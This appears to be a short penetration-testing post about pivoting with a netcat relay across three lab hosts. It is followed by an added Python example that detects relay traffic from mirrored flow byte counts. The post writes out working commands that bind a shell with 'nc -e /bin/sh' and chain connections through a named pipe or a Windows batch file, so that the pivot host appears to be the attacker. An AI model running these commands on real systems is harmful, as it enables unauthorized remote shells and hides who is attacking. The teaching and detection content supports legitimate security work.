The netcat relay works if you have 3 hosts:
Host 1 - 10.9.9.5 - Attacker
Host 2 - 10.9.9.10 - Compromised Victim (Pivot point or relay point)
Host 3 - 10.9.9.15 - Compromised Victim
On Host 1 you execute: "nc -l -p 4545". This opens a listening port on your attacking computer.
On Host 3 you execute: "nc -l -p 2525 -e /bin/sh". This opens a listening port and upon connect executes an interactive shell.
Then on Host 2 you execute the following commands:
"mknod backpipe p"
"nc 10.9.9.5 4545 0<backpipe | nc 10.9.9.15 2525 1>backpipe"
If a Windows host were in the middle, you would execute the following:
"echo nc 10.9.9.15 2525 > relay.bat" # You need permission to write a file called relay.bat
"nc 10.9.9.5 4545 -e relay.bat"
The commands that are executed on Host 1 are then relayed through Host 2 to Host 3, giving the appearance that Host 2 is the one attacking Host 3.
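For defenders, the relay on Host 2 (Linux or Windows variant) leaves a recognisable network footprint: two simultaneous outbound connections whose byte counts mirror each other. The following is an added example, not part of the original post; the flow-record fields, thresholds and sample rows are assumptions constructed for illustration.

```python
from collections import namedtuple
from itertools import combinations

# Hypothetical per-connection summary, as a NetFlow/Zeek-style sensor might emit.
# sent/rcvd are payload bytes from the initiator's (src) point of view.
Flow = namedtuple("Flow", "src dst dport start end sent rcvd")

# Constructed sample rows (not captured traffic), using the post's addresses.
SAMPLE_FLOWS = [
    Flow("10.9.9.10", "10.9.9.5", 4545, 100.0, 460.0, 18432, 212),
    Flow("10.9.9.10", "10.9.9.15", 2525, 100.2, 460.0, 212, 18432),
    Flow("10.9.9.10", "10.9.9.20", 443, 90.0, 95.0, 900, 15000),   # unrelated web fetch
    Flow("10.9.9.15", "10.9.9.20", 80, 120.0, 121.0, 400, 5200),   # unrelated
    Flow("10.9.9.30", "10.9.9.5", 22, 10.0, 500.0, 0, 0),          # idle
    Flow("10.9.9.30", "10.9.9.15", 22, 10.0, 500.0, 0, 0),         # idle
]


def overlap(a, b):
    """Seconds during which both connections were open."""
    return min(a.end, b.end) - max(a.start, b.start)


def mirrored(x, y, tol):
    """True when two byte counts agree within a relative tolerance."""
    return abs(x - y) <= tol * max(x, y, 1)


def find_relays(flows, min_overlap=5.0, tol=0.05, min_bytes=64):
    """Return (pivot, (peer_a, port_a), (peer_b, port_b)) for relay-shaped flow pairs."""
    by_src = {}
    for f in flows:
        by_src.setdefault(f.src, []).append(f)
    hits = []
    for src, group in by_src.items():
        for a, b in combinations(group, 2):
            if a.dst == b.dst or overlap(a, b) < min_overlap:
                continue
            if a.sent + a.rcvd < min_bytes:
                continue  # idle pairs trivially "mirror" at zero bytes
            # A pipe relay forwards everything: bytes in from one peer equal
            # bytes out to the other, in both directions.
            if mirrored(a.rcvd, b.sent, tol) and mirrored(a.sent, b.rcvd, tol):
                hits.append((src, (a.dst, a.dport), (b.dst, b.dport)))
    return hits


if __name__ == "__main__":
    for hit in find_relays(SAMPLE_FLOWS):
        print("possible relay:", hit)
```

Legitimate proxies and port forwarders produce the same shape, so treat a hit as a lead to check against the host's expected role rather than as a verdict.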
Here is a link to the SANS netcat cheat sheet demonstrating how it can be done on Windows also.
Here is a link to a video that goes through the above scenario using 3 Linux hosts. In the book it is a little different, since their example uses only an Attacker and a Victim, which works also!